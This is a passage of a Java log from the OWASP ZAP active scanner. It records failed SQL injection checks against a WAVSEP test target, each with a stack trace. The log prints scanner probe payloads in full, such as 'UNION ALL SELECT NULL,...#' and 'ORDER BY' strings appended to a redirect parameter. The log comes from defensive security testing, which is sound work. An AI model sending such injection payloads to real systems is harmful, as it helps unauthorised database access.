org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681891 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681892 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681892 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681893 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681893 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681894 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681895 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 3239#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 3239# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681896 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681896 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681897 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681897 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681899 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681899 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at 